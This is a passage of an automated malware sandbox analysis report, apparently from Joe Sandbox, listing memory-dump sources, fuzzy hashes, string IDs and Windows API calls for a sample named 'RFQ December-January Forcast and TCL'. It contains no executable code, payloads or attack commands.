                                                                                                            • Opcode Fuzzy Hash: 2dcc3ba485c4e7fa4b18818a8ed5cddae9f7be640979e7da6edf05012ffc8157
                                                                                                            • Instruction Fuzzy Hash: 08814634A00905CFCB18CF69C8889EAB7B3BFC8315B658179D4169B365EB31EC81CB91
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970021636.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_110000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 4'^q$4'^q
                                                                                                            • API String ID: 0-2697143702
                                                                                                            • Opcode ID: 0b832da2d314ebc2b8229973be52c6c087330f417e297a9e4547963a6b1c0e32
                                                                                                            • Instruction ID: d13b646b4005824b0b4d62b80fa1f55972f2117b40dc2456852aba16142cde81
                                                                                                            • Opcode Fuzzy Hash: 0b832da2d314ebc2b8229973be52c6c087330f417e297a9e4547963a6b1c0e32
                                                                                                            • Instruction Fuzzy Hash: B5518E70B042168FCB18DB6988906FEB7FAAF88300F15C479E505DB252DF35DD868BA1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 4'^q$4'^q
                                                                                                            • API String ID: 0-2697143702
                                                                                                            • Opcode ID: 3f6bf9ffc6b5bb4d85323a5b3b3baaa98e5e700c78306d335d2d717e8b905ecd
                                                                                                            • Instruction ID: fc83496c54a1ce02a2e92249765bf4db242edff687d047a7270ed16fbfa566d3
                                                                                                            • Opcode Fuzzy Hash: 3f6bf9ffc6b5bb4d85323a5b3b3baaa98e5e700c78306d335d2d717e8b905ecd
                                                                                                            • Instruction Fuzzy Hash: 33515170A002499FCB05EFA8D8559AEBFF2FF85300F5085A5E045BB265DB319E46CF91
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970021636.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_110000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q
                                                                                                            • API String ID: 0-355816377
                                                                                                            • Opcode ID: d3b2684f8921eeed0cd0e1b6d4720a7ab4ce7dcf531ecf589fcab8869e47734e
                                                                                                            • Instruction ID: 71a0eba32b0f59784da6440aac4985a8365bc3ea5d1ab786e6a73f2d29520149
                                                                                                            • Opcode Fuzzy Hash: d3b2684f8921eeed0cd0e1b6d4720a7ab4ce7dcf531ecf589fcab8869e47734e
                                                                                                            • Instruction Fuzzy Hash: CE3141303082164FDB2D9B38D8945BE7BB5AB85700B2548BAE066CB7D1DB25DCC2C7A1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970021636.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_110000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 4'^q$4'^q
                                                                                                            • API String ID: 0-2697143702
                                                                                                            • Opcode ID: 84060673e45eb68f2560ed3f8cef47428785bf15b7be69bb31e51ef5a1b92a04
                                                                                                            • Instruction ID: 1c4e7f31f0031e9571f706ca5fa147d0942e1f83fd86826c3968f4819aaad65e
                                                                                                            • Opcode Fuzzy Hash: 84060673e45eb68f2560ed3f8cef47428785bf15b7be69bb31e51ef5a1b92a04
                                                                                                            • Instruction Fuzzy Hash: E5F04F353002146FDB0C5AAAA8549BABADBEFDC3A1B148439F909C7391DE71CC4187A1
                                                                                                            APIs
                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 36B20222
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992884626.0000000036B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b20000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 716092398-0
                                                                                                            • Opcode ID: 0d5c1cb80bb02c6b1c05036a530139408f75fd2c25746bb159dd3ec7bf23d7ff
                                                                                                            • Instruction ID: dd828aad182138e19471b4d75881c7d5716c13045a926d73eb5832f897e0ad4f
                                                                                                            • Opcode Fuzzy Hash: 0d5c1cb80bb02c6b1c05036a530139408f75fd2c25746bb159dd3ec7bf23d7ff
                                                                                                            • Instruction Fuzzy Hash: 5B51EEB1C04249AFDB05CFA9C980ACEBFF5FF49310F24816AE918AB221D7719855CF91
                                                                                                            APIs
                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 36B20222
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992884626.0000000036B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b20000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 716092398-0
                                                                                                            • Opcode ID: f29cfd67b74cdbd3c0e8c72a2f83976f6c1898141cb1a271c0de356f3f8d8a2a
                                                                                                            • Instruction ID: 2f4824959d12a03d4da0529ade5a88aad7c576d0b9d59806dfd0216a0f037036
                                                                                                            • Opcode Fuzzy Hash: f29cfd67b74cdbd3c0e8c72a2f83976f6c1898141cb1a271c0de356f3f8d8a2a
                                                                                                            • Instruction Fuzzy Hash: 0351C0B1D103199FDB14CF9AC884ADEBBF5FF48310F60812AE819AB210D774A985CF91
                                                                                                            APIs
                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 36B20222
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992884626.0000000036B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b20000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 716092398-0
                                                                                                            • Opcode ID: 69983f4919715c61871c67b1d6afda1d81d0442fb6251550e74b9dafe3e5d538
                                                                                                            • Instruction ID: 55f5575ec5a253051a48ba1ae90ae9d99d1400b4243d29f220df7c88176b9dc2
                                                                                                            • Opcode Fuzzy Hash: 69983f4919715c61871c67b1d6afda1d81d0442fb6251550e74b9dafe3e5d538
                                                                                                            • Instruction Fuzzy Hash: 7541A0B5D103199FDB14CF9AC884ADEBBF5FF48310F64852AE418AB210D774A985CF91
                                                                                                            APIs
                                                                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 36B21E81
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992884626.0000000036B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b20000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CallProcWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2714655100-0
                                                                                                            • Opcode ID: 0cf769cd5fd08439fdc62baff7149be60c5f064fd55c28b4ce68e225d41fec74
                                                                                                            • Instruction ID: 50e37b1a152c231274949fc434f6b05e998fb0f9857a21b1ffe8631745b69e1d
                                                                                                            • Opcode Fuzzy Hash: 0cf769cd5fd08439fdc62baff7149be60c5f064fd55c28b4ce68e225d41fec74
                                                                                                            • Instruction Fuzzy Hash: E24127B8A10309DFDB04DF99C848A9ABBF5FF88310F24C459D519AB321D774A841CFA1
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 36B20C4F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992884626.0000000036B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b20000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 3793708945-0
                                                                                                            • Opcode ID: 60ccf944c54edb828c482c40fc2e047c5d8dbfa51d53befda94184ba739a88e2
                                                                                                            • Instruction ID: 4f8572f9d8fe701064e95f8aed71e32c75bcfd4ba290dfc2e2637b0697bc32e5
                                                                                                            • Opcode Fuzzy Hash: 60ccf944c54edb828c482c40fc2e047c5d8dbfa51d53befda94184ba739a88e2
                                                                                                            • Instruction Fuzzy Hash: B121E4B5900208AFDB10CFAAD984ADEBFF9EB48320F14841AE958A3310D374A950CF61
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 36B20C4F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992884626.0000000036B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b20000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 3793708945-0
                                                                                                            • Opcode ID: f928b2355aabae05fc120bfafaad9c0833800debdaf9a5bbcc52f8b9c3eb3f8c
                                                                                                            • Instruction ID: d935cc0a50c430ceac156ecb48626f36c57462740953c7483862ac0fb979b2c6
                                                                                                            • Opcode Fuzzy Hash: f928b2355aabae05fc120bfafaad9c0833800debdaf9a5bbcc52f8b9c3eb3f8c
                                                                                                            • Instruction Fuzzy Hash: 8321E4B59002089FDB10CFAAD984ADEBFF4EB48320F14801AE958A3310D374A940CF61
                                                                                                            APIs
                                                                                                            • OleInitialize.OLE32(00000000), ref: 36B2D445
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992884626.0000000036B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b20000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Initialize
                                                                                                            • String ID:
                                                                                                            • API String ID: 2538663250-0
                                                                                                            • Opcode ID: f4f80dcddfe5be9af2595cd1991175ddafd1c070536e870009ce4dd947d619fe
                                                                                                            • Instruction ID: 2f51c4f17d256e90cf53420e31077687a323b0e2b8e50347782f698cfedfdbda
                                                                                                            • Opcode Fuzzy Hash: f4f80dcddfe5be9af2595cd1991175ddafd1c070536e870009ce4dd947d619fe
                                                                                                            • Instruction Fuzzy Hash: 191145B19003488FCB20DF9AC545B8EBBF4EB48324F20845AD518B3300C774A940CFA5
                                                                                                            APIs
                                                                                                            • OleInitialize.OLE32(00000000), ref: 36B2D445
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992884626.0000000036B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b20000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Initialize
                                                                                                            • String ID:
                                                                                                            • API String ID: 2538663250-0
                                                                                                            • Opcode ID: 182d1789b00842e59f1f4d5c90d11a04af66492bcf59935c8a7d3b86e4881bdc
                                                                                                            • Instruction ID: 42e74324326c985bd7e3086dc64f441af8c3b43e07df92e5a0cf4d8f440aae0d
                                                                                                            • Opcode Fuzzy Hash: 182d1789b00842e59f1f4d5c90d11a04af66492bcf59935c8a7d3b86e4881bdc
                                                                                                            • Instruction Fuzzy Hash: 851112B59003488FCB10DFAAD485BCEBFF4EB49320F20845AD569A7200C378A945CFA5
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992884626.0000000036B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b20000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DispatchMessage
                                                                                                            • String ID:
                                                                                                            • API String ID: 2061451462-0
                                                                                                            • Opcode ID: 2f908d739c8e68b779b3654bbc7b55280e1a6e46d7f0395211476de12d8d5eb0
                                                                                                            • Instruction ID: 78e69fb6e9922534bf67cc4dd186d3a5b9e0bc4bf0782c86916347c1f329e19f
                                                                                                            • Opcode Fuzzy Hash: 2f908d739c8e68b779b3654bbc7b55280e1a6e46d7f0395211476de12d8d5eb0
                                                                                                            • Instruction Fuzzy Hash: 8D11F2B5C002598FCB10DF9AE444BDEBBF4EB48320F10841AD459B3210D778A544CFA5
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992884626.0000000036B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b20000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Timer
                                                                                                            • String ID:
                                                                                                            • API String ID: 2870079774-0
                                                                                                            • Opcode ID: 36c79eab0f2a08a243e3ce15ea53d8d9cd4d4ddee30b87abcd183539aa93cb44
                                                                                                            • Instruction ID: 02790b63581fcc843b22c7bb2f71500bb7c16450e13f95c6ed0bdab8ab731530
                                                                                                            • Opcode Fuzzy Hash: 36c79eab0f2a08a243e3ce15ea53d8d9cd4d4ddee30b87abcd183539aa93cb44
                                                                                                            • Instruction Fuzzy Hash: 041122B5900349CFDB10DF99D885BDEBFF4EB48320F10840AD558A7200C378A584CFA4
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992884626.0000000036B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b20000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Timer
                                                                                                            • String ID:
                                                                                                            • API String ID: 2870079774-0
                                                                                                            • Opcode ID: 30ef9e333718ca06f334cacf4a1021187163ad6257a06da0b1e0896f2ee5251c
                                                                                                            • Instruction ID: bf41814aae655035f39a703e6db09178ad60409654ee358b93e8766127563d6d
                                                                                                            • Opcode Fuzzy Hash: 30ef9e333718ca06f334cacf4a1021187163ad6257a06da0b1e0896f2ee5251c
                                                                                                            • Instruction Fuzzy Hash: 371103B58003489FCB10DF9AD845BDEBBF8EB48320F10841AE558A7200C375A984CFA5
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992884626.0000000036B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b20000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DispatchMessage
                                                                                                            • String ID:
                                                                                                            • API String ID: 2061451462-0
                                                                                                            • Opcode ID: b71a9f653036485a02a3dec10cf512b798e4eac755ce07a609a950e3b36f567e
                                                                                                            • Instruction ID: b81db17c606aa420d63c087f5137d06edb564920171da97de7c5c30daf9a744d
                                                                                                            • Opcode Fuzzy Hash: b71a9f653036485a02a3dec10cf512b798e4eac755ce07a609a950e3b36f567e
                                                                                                            • Instruction Fuzzy Hash: AC11FBB5C002488FCB10DF9AE844B8EFBF4EB48320F10842AE468A3210D378A644CFA5
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970021636.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_110000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: LR^q
                                                                                                            • API String ID: 0-2625958711
                                                                                                            • Opcode ID: 38295449be60a1d65ee56270f45e3550b28cb7405ea4128a344eea7fd9610025
                                                                                                            • Instruction ID: 7c88860b7e7e2f6dae9a820f45299728906dd29a624dc4175d1785c569d51e11
                                                                                                            • Opcode Fuzzy Hash: 38295449be60a1d65ee56270f45e3550b28cb7405ea4128a344eea7fd9610025
                                                                                                            • Instruction Fuzzy Hash: 97A1C774A1025ADFDB14EFB8E98499DBBB2FB48302B104629E405BB365DF716947CF80
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970021636.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_110000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: LR^q
                                                                                                            • API String ID: 0-2625958711
                                                                                                            • Opcode ID: b12162ae92611fcc74ca479fff6d1a87634ad7e094367ae3da6d3eed4d2b31d6
                                                                                                            • Instruction ID: 3aff1efd6c009b85cd044ba0f1bda571f3d60ebec7d34a0fa642f4fe575d749b
                                                                                                            • Opcode Fuzzy Hash: b12162ae92611fcc74ca479fff6d1a87634ad7e094367ae3da6d3eed4d2b31d6
                                                                                                            • Instruction Fuzzy Hash: FFA1B674A1025ADFDB14EFB8E98499DBBB2FB48302B104529E409BB365DF716947CF80
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970021636.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_110000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (o^q
                                                                                                            • API String ID: 0-74704288
                                                                                                            • Opcode ID: 5b4c6ac02ce8a0a6983ce999c9be6bf5fb9aaaa69d7951ffefd2cba34c44d415
                                                                                                            • Instruction ID: 45ba2ffb29d1f5f2d0ef4c647c45a72ad0fa8bc52805d133d530c02aff7ed2e6
                                                                                                            • Opcode Fuzzy Hash: 5b4c6ac02ce8a0a6983ce999c9be6bf5fb9aaaa69d7951ffefd2cba34c44d415
                                                                                                            • Instruction Fuzzy Hash: 0241F231B002049FCB099B69D854AAE7BB6AFC8711F144069E916D7791CF319E41CB90
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970021636.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_110000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: T
                                                                                                            • API String ID: 0-3187964512
                                                                                                            • Opcode ID: a1c8411cce68b5ae0d5fdcd304f574940cf08bf4a5e21b283b55a4b5df27973c
                                                                                                            • Instruction ID: 8070a1f1f954e3100cff0dd877077d621eb6b84f5f3acd34f2fa85863e46e4b8
                                                                                                            • Opcode Fuzzy Hash: a1c8411cce68b5ae0d5fdcd304f574940cf08bf4a5e21b283b55a4b5df27973c
                                                                                                            • Instruction Fuzzy Hash: E1418F307012458FDB08DF68C884BEA7BA6EF89304F14C476E915CB255DB71DD85DBA2
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: ,q'4
                                                                                                            • API String ID: 0-1709345581
                                                                                                            • Opcode ID: 9f2a7539fa9626469b2e82b8484c993dc76855db33138c120e34a9a2ec5dab21
                                                                                                            • Instruction ID: 772fa41604e0e9b159193a5be9af54440e9fd7dfde543966c84a6536bb362666
                                                                                                            • Opcode Fuzzy Hash: 9f2a7539fa9626469b2e82b8484c993dc76855db33138c120e34a9a2ec5dab21
                                                                                                            • Instruction Fuzzy Hash: D7016970700A218F9314DF2EC44191ABBFAEF89744305896AE50ACB321EB30ED468F80
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: ,q'4
                                                                                                            • API String ID: 0-1709345581
                                                                                                            • Opcode ID: 85797f0f21933ec9cacd93a6db17ee17aae60677c0dc2023d3fb7fed3197a482
                                                                                                            • Instruction ID: 05887e4469e8c898180e91cd3e802690bce68996f25f3cd84fd04c234e607974
                                                                                                            • Opcode Fuzzy Hash: 85797f0f21933ec9cacd93a6db17ee17aae60677c0dc2023d3fb7fed3197a482
                                                                                                            • Instruction Fuzzy Hash: 02116971700A118FC314DF2ED44191ABBFAFF897447158669E40ACB735EB30ED469B80
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7185c7f6cba9273d80d9eaa70763efc917e67246c569d2060e4a15559410f2df
                                                                                                            • Instruction ID: f8b420fa3ab09ad0d4b0891f70c5ce7c0694756121320103348a73ead39ad5d4
                                                                                                            • Opcode Fuzzy Hash: 7185c7f6cba9273d80d9eaa70763efc917e67246c569d2060e4a15559410f2df
                                                                                                            • Instruction Fuzzy Hash: F5E1D174A10228DFDB25DF64D954BEDBBB2EB89301F1085A9D90977350CB365E82DF40
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1db69b44699988dd5d4e1070ce7c36788fa9a59ffe4a3a5f11c220b85d158002
                                                                                                            • Instruction ID: ea92b108038e8feba95b698b02aa0acaff2d74819a27b2f9d3c0604dfe8f3618
                                                                                                            • Opcode Fuzzy Hash: 1db69b44699988dd5d4e1070ce7c36788fa9a59ffe4a3a5f11c220b85d158002
                                                                                                            • Instruction Fuzzy Hash: 23E1D274A10228DFDB25DF64D994BEDBBB2EB89302F1084A9D90977350CB365E82DF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970021636.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_110000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4e4b067bcc74459554103e085027fa0fdb30dd5860bf2d4d5289ca7509f5f0dc
                                                                                                            • Instruction ID: a0e96b5c0cf6f9a57bb50231d3fb26f824db7769a6141217d624c59e2ca51f9c
                                                                                                            • Opcode Fuzzy Hash: 4e4b067bcc74459554103e085027fa0fdb30dd5860bf2d4d5289ca7509f5f0dc
                                                                                                            • Instruction Fuzzy Hash: 68712C34700605CFCB18DF68C894AAD7BE6AF49700F1945A9E805CB3B1DB76EC81CB91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970021636.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_110000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 23edf816d5f6a1acd68b965c44cc34f6fe889a32f4594f8c7d69251e93ac0598
                                                                                                            • Instruction ID: 40410f9c27b3407afe5f93d90b57ac08051206243e73a425ce75fac04b35bc8d
                                                                                                            • Opcode Fuzzy Hash: 23edf816d5f6a1acd68b965c44cc34f6fe889a32f4594f8c7d69251e93ac0598
                                                                                                            • Instruction Fuzzy Hash: AE717631608755DFC719CF28D8D89AA7BB1FF4A311B0684A9F8559B272C731EC80CB91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c89ab33df6c56315624b576dfda8de78ca1d0878093f03cb6940732fae5576ce
                                                                                                            • Instruction ID: 43b30f5a4616b73e7031fd21dacb3d4fd5d3dfe658251d9aaac6e6d519ee4909
                                                                                                            • Opcode Fuzzy Hash: c89ab33df6c56315624b576dfda8de78ca1d0878093f03cb6940732fae5576ce
                                                                                                            • Instruction Fuzzy Hash: 59710574E003199FDB05DFB9C8989ADBFB2FF88305F10852AE906AB254DB749942CF41
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1b300349840bc869ead442888005f03d427b976abbd1d8a44f0c44e5c68b7ce3
                                                                                                            • Instruction ID: 84c9ac0654c3f476a51ff6e2c77e7dddd51055cbaaa645bd8749c5d40889da27
                                                                                                            • Opcode Fuzzy Hash: 1b300349840bc869ead442888005f03d427b976abbd1d8a44f0c44e5c68b7ce3
                                                                                                            • Instruction Fuzzy Hash: 50610974A10269DFDB25DF64D954BADBBB2FB88301F1084AA9A0A77350CF365D82DF00
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: afc9f815f084e762600b96d5ad4e860ebc212949df2733fa00e6b4ac6462a846
                                                                                                            • Instruction ID: 6aef53a2fa1ec637ac239ae9e2c28f415fe1a9323e932642b68a229f0ecdff5a
                                                                                                            • Opcode Fuzzy Hash: afc9f815f084e762600b96d5ad4e860ebc212949df2733fa00e6b4ac6462a846
                                                                                                            • Instruction Fuzzy Hash: 1C51EF74D01328DFDB15DFA5D894AADBBB2FF88305F208529D809BB254DB355986CF40
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e08b24b89c2c17bbdf87e630580e110d099dc07fa3a8c3838f86195f83196e74
                                                                                                            • Instruction ID: a8e07cb629b463f3eca27b8fc4172cc0e8ecdc1f33398caac21c056aad831dca
                                                                                                            • Opcode Fuzzy Hash: e08b24b89c2c17bbdf87e630580e110d099dc07fa3a8c3838f86195f83196e74
